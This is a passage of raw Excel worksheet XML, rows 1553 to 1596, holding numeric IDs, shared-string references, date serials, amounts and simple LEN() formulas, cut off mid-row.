      <c r="D1553" t="s">
        <v>10008</v>
      </c>
      <c r="E1553">
        <v>28</v>
      </c>
      <c r="F1553" t="s">
        <v>2236</v>
      </c>
      <c r="G1553" s="1">
        <v>43888</v>
      </c>
      <c r="H1553">
        <v>10000</v>
      </c>
      <c r="I1553" t="s">
        <v>9536</v>
      </c>
      <c r="K1553">
        <f>LEN(I1553)</f>
        <v>13</v>
      </c>
      <c r="L1553">
        <f>LEN(J1553)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1554" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1554">
        <v>19715</v>
      </c>
      <c r="B1554">
        <v>1846</v>
      </c>
      <c r="C1554" t="s">
        <v>16387</v>
      </c>
      <c r="D1554" t="s">
        <v>16388</v>
      </c>
      <c r="E1554">
        <v>16</v>
      </c>
      <c r="F1554" t="s">
        <v>5224</v>
      </c>
      <c r="G1554" s="1">
        <v>43865</v>
      </c>
      <c r="H1554" s="4">
        <v>120000</v>
      </c>
      <c r="I1554" t="s">
        <v>9536</v>
      </c>
      <c r="K1554">
        <f>LEN(I1554)</f>
        <v>13</v>
      </c>
      <c r="L1554">
        <f>LEN(J1554)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1555" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1555">
        <v>19755</v>
      </c>
      <c r="B1555">
        <v>2157</v>
      </c>
      <c r="C1555" t="s">
        <v>4725</v>
      </c>
      <c r="D1555" t="s">
        <v>9520</v>
      </c>
      <c r="E1555">
        <v>12</v>
      </c>
      <c r="F1555" t="s">
        <v>10226</v>
      </c>
      <c r="G1555" s="1">
        <v>43861</v>
      </c>
      <c r="H1555">
        <v>2000</v>
      </c>
      <c r="I1555" t="s">
        <v>9522</v>
      </c>
      <c r="K1555">
        <f>LEN(I1555)</f>
        <v>13</v>
      </c>
      <c r="L1555">
        <f>LEN(J1555)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1556" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1556">
        <v>20121</v>
      </c>
      <c r="B1556">
        <v>560</v>
      </c>
      <c r="C1556" t="s">
        <v>671</v>
      </c>
      <c r="D1556" t="s">
        <v>10486</v>
      </c>
      <c r="E1556">
        <v>24</v>
      </c>
      <c r="F1556" t="s">
        <v>673</v>
      </c>
      <c r="G1556" s="1">
        <v>43949</v>
      </c>
      <c r="H1556">
        <v>120000</v>
      </c>
      <c r="I1556" t="s">
        <v>9536</v>
      </c>
      <c r="K1556">
        <f>LEN(I1556)</f>
        <v>13</v>
      </c>
      <c r="L1556">
        <f>LEN(J1556)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1557" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1557">
        <v>20693</v>
      </c>
      <c r="B1557">
        <v>395</v>
      </c>
      <c r="C1557" t="s">
        <v>1151</v>
      </c>
      <c r="D1557" t="s">
        <v>10894</v>
      </c>
      <c r="E1557">
        <v>31</v>
      </c>
      <c r="F1557" t="s">
        <v>9714</v>
      </c>
      <c r="G1557" s="1">
        <v>43971</v>
      </c>
      <c r="H1557">
        <v>12000</v>
      </c>
      <c r="I1557" t="s">
        <v>9536</v>
      </c>
      <c r="K1557">
        <f>LEN(I1557)</f>
        <v>13</v>
      </c>
      <c r="L1557">
        <f>LEN(J1557)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1558" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1558">
        <v>20129</v>
      </c>
      <c r="B1558">
        <v>2054</v>
      </c>
      <c r="C1558" t="s">
        <v>5675</v>
      </c>
      <c r="D1558" t="s">
        <v>10493</v>
      </c>
      <c r="E1558">
        <v>18</v>
      </c>
      <c r="F1558" t="s">
        <v>8295</v>
      </c>
      <c r="G1558" s="1">
        <v>43920</v>
      </c>
      <c r="H1558">
        <v>1000</v>
      </c>
      <c r="I1558" t="s">
        <v>10494</v>
      </c>
      <c r="K1558">
        <f>LEN(I1558)</f>
        <v>12</v>
      </c>
      <c r="L1558">
        <f>LEN(J1558)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1559" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1559">
        <v>20442</v>
      </c>
      <c r="B1559">
        <v>2616</v>
      </c>
      <c r="C1559" t="s">
        <v>5865</v>
      </c>
      <c r="D1559" t="s">
        <v>10720</v>
      </c>
      <c r="E1559">
        <v>11</v>
      </c>
      <c r="F1559" t="s">
        <v>2924</v>
      </c>
      <c r="G1559" s="1">
        <v>43966</v>
      </c>
      <c r="H1559">
        <v>450000</v>
      </c>
      <c r="I1559" t="s">
        <v>10721</v>
      </c>
      <c r="K1559">
        <f>LEN(I1559)</f>
        <v>12</v>
      </c>
      <c r="L1559">
        <f>LEN(J1559)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1560" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1560">
        <v>20443</v>
      </c>
      <c r="B1560">
        <v>2616</v>
      </c>
      <c r="C1560" t="s">
        <v>5865</v>
      </c>
      <c r="D1560" t="s">
        <v>10720</v>
      </c>
      <c r="E1560">
        <v>11</v>
      </c>
      <c r="F1560" t="s">
        <v>9438</v>
      </c>
      <c r="G1560" s="1">
        <v>43966</v>
      </c>
      <c r="H1560">
        <v>350000</v>
      </c>
      <c r="I1560" t="s">
        <v>10721</v>
      </c>
      <c r="K1560">
        <f>LEN(I1560)</f>
        <v>12</v>
      </c>
      <c r="L1560">
        <f>LEN(J1560)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1561" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1561">
        <v>20444</v>
      </c>
      <c r="B1561">
        <v>2616</v>
      </c>
      <c r="C1561" t="s">
        <v>5865</v>
      </c>
      <c r="D1561" t="s">
        <v>10720</v>
      </c>
      <c r="E1561">
        <v>11</v>
      </c>
      <c r="F1561" t="s">
        <v>10722</v>
      </c>
      <c r="G1561" s="1">
        <v>43966</v>
      </c>
      <c r="H1561">
        <v>50000</v>
      </c>
      <c r="I1561" t="s">
        <v>10721</v>
      </c>
      <c r="K1561">
        <f>LEN(I1561)</f>
        <v>12</v>
      </c>
      <c r="L1561">
        <f>LEN(J1561)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1562" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1562">
        <v>20445</v>
      </c>
      <c r="B1562">
        <v>2616</v>
      </c>
      <c r="C1562" t="s">
        <v>5865</v>
      </c>
      <c r="D1562" t="s">
        <v>10720</v>
      </c>
      <c r="E1562">
        <v>11</v>
      </c>
      <c r="F1562" t="s">
        <v>9595</v>
      </c>
      <c r="G1562" s="1">
        <v>43966</v>
      </c>
      <c r="H1562">
        <v>100000</v>
      </c>
      <c r="I1562" t="s">
        <v>10721</v>
      </c>
      <c r="K1562">
        <f>LEN(I1562)</f>
        <v>12</v>
      </c>
      <c r="L1562">
        <f>LEN(J1562)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1563" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1563">
        <v>20446</v>
      </c>
      <c r="B1563">
        <v>2616</v>
      </c>
      <c r="C1563" t="s">
        <v>5865</v>
      </c>
      <c r="D1563" t="s">
        <v>10720</v>
      </c>
      <c r="E1563">
        <v>11</v>
      </c>
      <c r="F1563" t="s">
        <v>10723</v>
      </c>
      <c r="G1563" s="1">
        <v>43966</v>
      </c>
      <c r="H1563">
        <v>100000</v>
      </c>
      <c r="I1563" t="s">
        <v>10721</v>
      </c>
      <c r="K1563">
        <f>LEN(I1563)</f>
        <v>12</v>
      </c>
      <c r="L1563">
        <f>LEN(J1563)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1564" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1564">
        <v>20447</v>
      </c>
      <c r="B1564">
        <v>2616</v>
      </c>
      <c r="C1564" t="s">
        <v>5865</v>
      </c>
      <c r="D1564" t="s">
        <v>10720</v>
      </c>
      <c r="E1564">
        <v>11</v>
      </c>
      <c r="F1564" t="s">
        <v>9676</v>
      </c>
      <c r="G1564" s="1">
        <v>43966</v>
      </c>
      <c r="H1564">
        <v>150000</v>
      </c>
      <c r="I1564" t="s">
        <v>10721</v>
      </c>
      <c r="K1564">
        <f>LEN(I1564)</f>
        <v>12</v>
      </c>
      <c r="L1564">
        <f>LEN(J1564)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1565" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1565">
        <v>20448</v>
      </c>
      <c r="B1565">
        <v>2616</v>
      </c>
      <c r="C1565" t="s">
        <v>5865</v>
      </c>
      <c r="D1565" t="s">
        <v>10720</v>
      </c>
      <c r="E1565">
        <v>11</v>
      </c>
      <c r="F1565" t="s">
        <v>9561</v>
      </c>
      <c r="G1565" s="1">
        <v>43966</v>
      </c>
      <c r="H1565">
        <v>200000</v>
      </c>
      <c r="I1565" t="s">
        <v>10721</v>
      </c>
      <c r="K1565">
        <f>LEN(I1565)</f>
        <v>12</v>
      </c>
      <c r="L1565">
        <f>LEN(J1565)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1566" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1566">
        <v>20449</v>
      </c>
      <c r="B1566">
        <v>2750</v>
      </c>
      <c r="C1566" t="s">
        <v>6890</v>
      </c>
      <c r="D1566" t="s">
        <v>10724</v>
      </c>
      <c r="E1566">
        <v>32</v>
      </c>
      <c r="F1566" t="s">
        <v>6892</v>
      </c>
      <c r="G1566" s="1">
        <v>43923</v>
      </c>
      <c r="H1566">
        <v>240000</v>
      </c>
      <c r="I1566" t="s">
        <v>10725</v>
      </c>
      <c r="K1566">
        <f>LEN(I1566)</f>
        <v>12</v>
      </c>
      <c r="L1566">
        <f>LEN(J1566)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1567" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1567">
        <v>20205</v>
      </c>
      <c r="B1567">
        <v>2677</v>
      </c>
      <c r="C1567" t="s">
        <v>5740</v>
      </c>
      <c r="D1567" t="s">
        <v>10551</v>
      </c>
      <c r="E1567">
        <v>3</v>
      </c>
      <c r="F1567" t="s">
        <v>10552</v>
      </c>
      <c r="G1567" s="1">
        <v>44155</v>
      </c>
      <c r="H1567">
        <v>150</v>
      </c>
      <c r="I1567" t="s">
        <v>10553</v>
      </c>
      <c r="K1567">
        <f>LEN(I1567)</f>
        <v>11</v>
      </c>
      <c r="L1567">
        <f>LEN(J1567)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1568" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1568">
        <v>16988</v>
      </c>
      <c r="B1568">
        <v>2538</v>
      </c>
      <c r="C1568" t="s">
        <v>4142</v>
      </c>
      <c r="D1568" t="s">
        <v>9601</v>
      </c>
      <c r="E1568">
        <v>2</v>
      </c>
      <c r="F1568" t="s">
        <v>9437</v>
      </c>
      <c r="G1568" s="1">
        <v>43896</v>
      </c>
      <c r="H1568">
        <v>50000</v>
      </c>
      <c r="I1568" t="s">
        <v>9603</v>
      </c>
      <c r="K1568">
        <f>LEN(I1568)</f>
        <v>10</v>
      </c>
      <c r="L1568">
        <f>LEN(J1568)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1569" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1569">
        <v>17355</v>
      </c>
      <c r="B1569">
        <v>2109</v>
      </c>
      <c r="C1569" t="s">
        <v>4741</v>
      </c>
      <c r="D1569" t="s">
        <v>9773</v>
      </c>
      <c r="E1569">
        <v>13</v>
      </c>
      <c r="F1569" t="s">
        <v>9561</v>
      </c>
      <c r="G1569" s="1">
        <v>44153</v>
      </c>
      <c r="H1569">
        <v>10000000</v>
      </c>
      <c r="I1569" t="s">
        <v>9774</v>
      </c>
      <c r="K1569">
        <f>LEN(I1569)</f>
        <v>10</v>
      </c>
      <c r="L1569">
        <f>LEN(J1569)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1570" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1570">
        <v>17356</v>
      </c>
      <c r="B1570">
        <v>2109</v>
      </c>
      <c r="C1570" t="s">
        <v>4741</v>
      </c>
      <c r="D1570" t="s">
        <v>9773</v>
      </c>
      <c r="E1570">
        <v>13</v>
      </c>
      <c r="F1570" t="s">
        <v>9775</v>
      </c>
      <c r="G1570" s="1">
        <v>44153</v>
      </c>
      <c r="H1570">
        <v>5000000</v>
      </c>
      <c r="I1570" t="s">
        <v>9774</v>
      </c>
      <c r="K1570">
        <f>LEN(I1570)</f>
        <v>10</v>
      </c>
      <c r="L1570">
        <f>LEN(J1570)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1571" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1571">
        <v>17357</v>
      </c>
      <c r="B1571">
        <v>2109</v>
      </c>
      <c r="C1571" t="s">
        <v>4741</v>
      </c>
      <c r="D1571" t="s">
        <v>9773</v>
      </c>
      <c r="E1571">
        <v>13</v>
      </c>
      <c r="F1571" t="s">
        <v>9776</v>
      </c>
      <c r="G1571" s="1">
        <v>44153</v>
      </c>
      <c r="H1571">
        <v>5000000</v>
      </c>
      <c r="I1571" t="s">
        <v>9774</v>
      </c>
      <c r="K1571">
        <f>LEN(I1571)</f>
        <v>10</v>
      </c>
      <c r="L1571">
        <f>LEN(J1571)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1572" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1572">
        <v>17358</v>
      </c>
      <c r="B1572">
        <v>2109</v>
      </c>
      <c r="C1572" t="s">
        <v>4741</v>
      </c>
      <c r="D1572" t="s">
        <v>9773</v>
      </c>
      <c r="E1572">
        <v>13</v>
      </c>
      <c r="F1572" t="s">
        <v>9777</v>
      </c>
      <c r="G1572" s="1">
        <v>44153</v>
      </c>
      <c r="H1572">
        <v>5000000</v>
      </c>
      <c r="I1572" t="s">
        <v>9774</v>
      </c>
      <c r="K1572">
        <f>LEN(I1572)</f>
        <v>10</v>
      </c>
      <c r="L1572">
        <f>LEN(J1572)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1573" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1573">
        <v>17359</v>
      </c>
      <c r="B1573">
        <v>2109</v>
      </c>
      <c r="C1573" t="s">
        <v>4741</v>
      </c>
      <c r="D1573" t="s">
        <v>9773</v>
      </c>
      <c r="E1573">
        <v>13</v>
      </c>
      <c r="F1573" t="s">
        <v>9778</v>
      </c>
      <c r="G1573" s="1">
        <v>44153</v>
      </c>
      <c r="H1573">
        <v>5000000</v>
      </c>
      <c r="I1573" t="s">
        <v>9774</v>
      </c>
      <c r="K1573">
        <f>LEN(I1573)</f>
        <v>10</v>
      </c>
      <c r="L1573">
        <f>LEN(J1573)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1574" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1574">
        <v>17445</v>
      </c>
      <c r="B1574">
        <v>2234</v>
      </c>
      <c r="C1574" t="s">
        <v>5999</v>
      </c>
      <c r="D1574" t="s">
        <v>9789</v>
      </c>
      <c r="E1574">
        <v>7</v>
      </c>
      <c r="F1574" t="s">
        <v>9790</v>
      </c>
      <c r="G1574" s="1">
        <v>43934</v>
      </c>
      <c r="H1574">
        <v>400</v>
      </c>
      <c r="I1574" t="s">
        <v>9791</v>
      </c>
      <c r="K1574">
        <f>LEN(I1574)</f>
        <v>10</v>
      </c>
      <c r="L1574">
        <f>LEN(J1574)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1575" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1575">
        <v>19328</v>
      </c>
      <c r="B1575">
        <v>2295</v>
      </c>
      <c r="C1575" t="s">
        <v>4913</v>
      </c>
      <c r="D1575" t="s">
        <v>9609</v>
      </c>
      <c r="E1575">
        <v>2</v>
      </c>
      <c r="F1575" t="s">
        <v>9435</v>
      </c>
      <c r="G1575" s="1">
        <v>43900</v>
      </c>
      <c r="H1575">
        <v>50000</v>
      </c>
      <c r="I1575" t="s">
        <v>9603</v>
      </c>
      <c r="K1575">
        <f>LEN(I1575)</f>
        <v>10</v>
      </c>
      <c r="L1575">
        <f>LEN(J1575)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1576" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1576">
        <v>20288</v>
      </c>
      <c r="B1576">
        <v>2581</v>
      </c>
      <c r="C1576" t="s">
        <v>5795</v>
      </c>
      <c r="D1576" t="s">
        <v>10602</v>
      </c>
      <c r="E1576">
        <v>2</v>
      </c>
      <c r="F1576" t="s">
        <v>10603</v>
      </c>
      <c r="G1576" s="1">
        <v>44218</v>
      </c>
      <c r="H1576">
        <v>300000</v>
      </c>
      <c r="I1576" t="s">
        <v>9603</v>
      </c>
      <c r="K1576">
        <f>LEN(I1576)</f>
        <v>10</v>
      </c>
      <c r="L1576">
        <f>LEN(J1576)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1577" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1577">
        <v>16610</v>
      </c>
      <c r="B1577">
        <v>2253</v>
      </c>
      <c r="C1577" t="s">
        <v>2612</v>
      </c>
      <c r="D1577" t="s">
        <v>9422</v>
      </c>
      <c r="E1577">
        <v>16</v>
      </c>
      <c r="F1577" t="s">
        <v>9423</v>
      </c>
      <c r="G1577" s="1">
        <v>43928</v>
      </c>
      <c r="H1577">
        <v>20000</v>
      </c>
      <c r="K1577">
        <f>LEN(I1577)</f>
        <v>0</v>
      </c>
      <c r="L1577">
        <f>LEN(J1577)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1578" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1578">
        <v>16611</v>
      </c>
      <c r="B1578">
        <v>2281</v>
      </c>
      <c r="C1578" t="s">
        <v>6801</v>
      </c>
      <c r="D1578" t="s">
        <v>9424</v>
      </c>
      <c r="E1578">
        <v>33</v>
      </c>
      <c r="F1578" t="s">
        <v>1746</v>
      </c>
      <c r="G1578" s="1">
        <v>43990</v>
      </c>
      <c r="H1578">
        <v>200000</v>
      </c>
      <c r="K1578">
        <f>LEN(I1578)</f>
        <v>0</v>
      </c>
      <c r="L1578">
        <f>LEN(J1578)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1579" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1579">
        <v>16613</v>
      </c>
      <c r="B1579">
        <v>2299</v>
      </c>
      <c r="C1579" t="s">
        <v>6813</v>
      </c>
      <c r="D1579" t="s">
        <v>9428</v>
      </c>
      <c r="E1579">
        <v>23</v>
      </c>
      <c r="F1579" t="s">
        <v>364</v>
      </c>
      <c r="G1579" s="1">
        <v>43846</v>
      </c>
      <c r="H1579">
        <v>240000</v>
      </c>
      <c r="K1579">
        <f>LEN(I1579)</f>
        <v>0</v>
      </c>
      <c r="L1579">
        <f>LEN(J1579)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1580" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1580">
        <v>16621</v>
      </c>
      <c r="B1580">
        <v>527</v>
      </c>
      <c r="C1580" t="s">
        <v>2456</v>
      </c>
      <c r="D1580" t="s">
        <v>9429</v>
      </c>
      <c r="E1580">
        <v>12</v>
      </c>
      <c r="F1580" t="s">
        <v>9430</v>
      </c>
      <c r="G1580" s="1">
        <v>43852</v>
      </c>
      <c r="H1580">
        <v>200</v>
      </c>
      <c r="K1580">
        <f>LEN(I1580)</f>
        <v>0</v>
      </c>
      <c r="L1580">
        <f>LEN(J1580)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1581" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1581">
        <v>16624</v>
      </c>
      <c r="B1581">
        <v>2066</v>
      </c>
      <c r="C1581" t="s">
        <v>4934</v>
      </c>
      <c r="D1581" t="s">
        <v>9431</v>
      </c>
      <c r="E1581">
        <v>17</v>
      </c>
      <c r="F1581" t="s">
        <v>547</v>
      </c>
      <c r="G1581" s="1">
        <v>43843</v>
      </c>
      <c r="H1581">
        <v>1000</v>
      </c>
      <c r="K1581">
        <f>LEN(I1581)</f>
        <v>0</v>
      </c>
      <c r="L1581">
        <f>LEN(J1581)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1582" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1582">
        <v>16625</v>
      </c>
      <c r="B1582">
        <v>2066</v>
      </c>
      <c r="C1582" t="s">
        <v>4934</v>
      </c>
      <c r="D1582" t="s">
        <v>9431</v>
      </c>
      <c r="E1582">
        <v>17</v>
      </c>
      <c r="F1582" t="s">
        <v>3814</v>
      </c>
      <c r="G1582" s="1">
        <v>43843</v>
      </c>
      <c r="H1582">
        <v>20000</v>
      </c>
      <c r="K1582">
        <f>LEN(I1582)</f>
        <v>0</v>
      </c>
      <c r="L1582">
        <f>LEN(J1582)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1583" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1583">
        <v>16633</v>
      </c>
      <c r="B1583">
        <v>1048</v>
      </c>
      <c r="C1583" t="s">
        <v>3554</v>
      </c>
      <c r="D1583" t="s">
        <v>9432</v>
      </c>
      <c r="E1583">
        <v>14</v>
      </c>
      <c r="F1583" t="s">
        <v>9433</v>
      </c>
      <c r="G1583" s="1">
        <v>43865</v>
      </c>
      <c r="H1583">
        <v>700</v>
      </c>
      <c r="K1583">
        <f>LEN(I1583)</f>
        <v>0</v>
      </c>
      <c r="L1583">
        <f>LEN(J1583)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1584" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1584">
        <v>16636</v>
      </c>
      <c r="B1584">
        <v>2245</v>
      </c>
      <c r="C1584" t="s">
        <v>6132</v>
      </c>
      <c r="D1584" t="s">
        <v>9434</v>
      </c>
      <c r="E1584">
        <v>11</v>
      </c>
      <c r="F1584" t="s">
        <v>9438</v>
      </c>
      <c r="G1584" s="1">
        <v>43923</v>
      </c>
      <c r="H1584">
        <v>0</v>
      </c>
      <c r="K1584">
        <f>LEN(I1584)</f>
        <v>0</v>
      </c>
      <c r="L1584">
        <f>LEN(J1584)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1585" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1585">
        <v>16637</v>
      </c>
      <c r="B1585">
        <v>681</v>
      </c>
      <c r="C1585" t="s">
        <v>1571</v>
      </c>
      <c r="D1585" t="s">
        <v>9439</v>
      </c>
      <c r="E1585">
        <v>11</v>
      </c>
      <c r="F1585" t="s">
        <v>9437</v>
      </c>
      <c r="G1585" s="1">
        <v>43923</v>
      </c>
      <c r="H1585">
        <v>0</v>
      </c>
      <c r="K1585">
        <f>LEN(I1585)</f>
        <v>0</v>
      </c>
      <c r="L1585">
        <f>LEN(J1585)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1586" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1586">
        <v>16639</v>
      </c>
      <c r="B1586">
        <v>681</v>
      </c>
      <c r="C1586" t="s">
        <v>1571</v>
      </c>
      <c r="D1586" t="s">
        <v>9439</v>
      </c>
      <c r="E1586">
        <v>11</v>
      </c>
      <c r="F1586" t="s">
        <v>9438</v>
      </c>
      <c r="G1586" s="1">
        <v>43923</v>
      </c>
      <c r="H1586">
        <v>0</v>
      </c>
      <c r="K1586">
        <f>LEN(I1586)</f>
        <v>0</v>
      </c>
      <c r="L1586">
        <f>LEN(J1586)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1587" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1587">
        <v>16642</v>
      </c>
      <c r="B1587">
        <v>2274</v>
      </c>
      <c r="C1587" t="s">
        <v>6795</v>
      </c>
      <c r="D1587" t="s">
        <v>9440</v>
      </c>
      <c r="E1587">
        <v>26</v>
      </c>
      <c r="F1587" t="s">
        <v>673</v>
      </c>
      <c r="G1587" s="1">
        <v>43923</v>
      </c>
      <c r="H1587">
        <v>1500000</v>
      </c>
      <c r="K1587">
        <f>LEN(I1587)</f>
        <v>0</v>
      </c>
      <c r="L1587">
        <f>LEN(J1587)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1588" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1588">
        <v>16643</v>
      </c>
      <c r="B1588">
        <v>2274</v>
      </c>
      <c r="C1588" t="s">
        <v>6795</v>
      </c>
      <c r="D1588" t="s">
        <v>9440</v>
      </c>
      <c r="E1588">
        <v>26</v>
      </c>
      <c r="F1588" t="s">
        <v>9441</v>
      </c>
      <c r="G1588" s="1">
        <v>43923</v>
      </c>
      <c r="H1588">
        <v>500000</v>
      </c>
      <c r="K1588">
        <f>LEN(I1588)</f>
        <v>0</v>
      </c>
      <c r="L1588">
        <f>LEN(J1588)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1589" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1589">
        <v>16644</v>
      </c>
      <c r="B1589">
        <v>2253</v>
      </c>
      <c r="C1589" t="s">
        <v>2612</v>
      </c>
      <c r="D1589" t="s">
        <v>9422</v>
      </c>
      <c r="E1589">
        <v>16</v>
      </c>
      <c r="F1589" t="s">
        <v>9442</v>
      </c>
      <c r="G1589" s="1">
        <v>43965</v>
      </c>
      <c r="H1589">
        <v>354295</v>
      </c>
      <c r="K1589">
        <f>LEN(I1589)</f>
        <v>0</v>
      </c>
      <c r="L1589">
        <f>LEN(J1589)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1590" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1590">
        <v>16645</v>
      </c>
      <c r="B1590">
        <v>2253</v>
      </c>
      <c r="C1590" t="s">
        <v>2612</v>
      </c>
      <c r="D1590" t="s">
        <v>9422</v>
      </c>
      <c r="E1590">
        <v>16</v>
      </c>
      <c r="F1590" t="s">
        <v>9443</v>
      </c>
      <c r="G1590" s="1">
        <v>43965</v>
      </c>
      <c r="H1590">
        <v>346189</v>
      </c>
      <c r="K1590">
        <f>LEN(I1590)</f>
        <v>0</v>
      </c>
      <c r="L1590">
        <f>LEN(J1590)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1591" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1591">
        <v>16646</v>
      </c>
      <c r="B1591">
        <v>2253</v>
      </c>
      <c r="C1591" t="s">
        <v>2612</v>
      </c>
      <c r="D1591" t="s">
        <v>9422</v>
      </c>
      <c r="E1591">
        <v>16</v>
      </c>
      <c r="F1591" t="s">
        <v>9444</v>
      </c>
      <c r="G1591" s="1">
        <v>43965</v>
      </c>
      <c r="H1591">
        <v>10000</v>
      </c>
      <c r="K1591">
        <f>LEN(I1591)</f>
        <v>0</v>
      </c>
      <c r="L1591">
        <f>LEN(J1591)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1592" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1592">
        <v>16647</v>
      </c>
      <c r="B1592">
        <v>2253</v>
      </c>
      <c r="C1592" t="s">
        <v>2612</v>
      </c>
      <c r="D1592" t="s">
        <v>9422</v>
      </c>
      <c r="E1592">
        <v>16</v>
      </c>
      <c r="F1592" t="s">
        <v>9445</v>
      </c>
      <c r="G1592" s="1">
        <v>43965</v>
      </c>
      <c r="H1592">
        <v>0</v>
      </c>
      <c r="K1592">
        <f>LEN(I1592)</f>
        <v>0</v>
      </c>
      <c r="L1592">
        <f>LEN(J1592)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1593" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1593">
        <v>16648</v>
      </c>
      <c r="B1593">
        <v>2253</v>
      </c>
      <c r="C1593" t="s">
        <v>2612</v>
      </c>
      <c r="D1593" t="s">
        <v>9422</v>
      </c>
      <c r="E1593">
        <v>16</v>
      </c>
      <c r="F1593" t="s">
        <v>9446</v>
      </c>
      <c r="G1593" s="1">
        <v>43965</v>
      </c>
      <c r="H1593">
        <v>0</v>
      </c>
      <c r="K1593">
        <f>LEN(I1593)</f>
        <v>0</v>
      </c>
      <c r="L1593">
        <f>LEN(J1593)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1594" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1594">
        <v>16649</v>
      </c>
      <c r="B1594">
        <v>2253</v>
      </c>
      <c r="C1594" t="s">
        <v>2612</v>
      </c>
      <c r="D1594" t="s">
        <v>9422</v>
      </c>
      <c r="E1594">
        <v>16</v>
      </c>
      <c r="F1594" t="s">
        <v>9447</v>
      </c>
      <c r="G1594" s="1">
        <v>43965</v>
      </c>
      <c r="H1594">
        <v>310788</v>
      </c>
      <c r="K1594">
        <f>LEN(I1594)</f>
        <v>0</v>
      </c>
      <c r="L1594">
        <f>LEN(J1594)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1595" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1595">
        <v>16650</v>
      </c>
      <c r="B1595">
        <v>2253</v>
      </c>
      <c r="C1595" t="s">
        <v>2612</v>
      </c>
      <c r="D1595" t="s">
        <v>9422</v>
      </c>
      <c r="E1595">
        <v>16</v>
      </c>
      <c r="F1595" t="s">
        <v>9448</v>
      </c>
      <c r="G1595" s="1">
        <v>43965</v>
      </c>
      <c r="H1595">
        <v>118639</v>
      </c>
      <c r="K1595">
        <f>LEN(I1595)</f>
        <v>0</v>
      </c>
      <c r="L1595">
        <f>LEN(J1595)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1596" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1596">
        <v>16651</v>
      </c>
      <c r="B1596">
        <v>2253</v>
      </c>
      <c r="C1596" t="s">
        <v>2612</v>
      </c>
      <c r="D1596" t="s">
        <v>9422</v>
      </c>
      <c r="E1596">
        <v>16</v>
      </c>
      <c r="F1596" t="s">
        <v>9437</v>
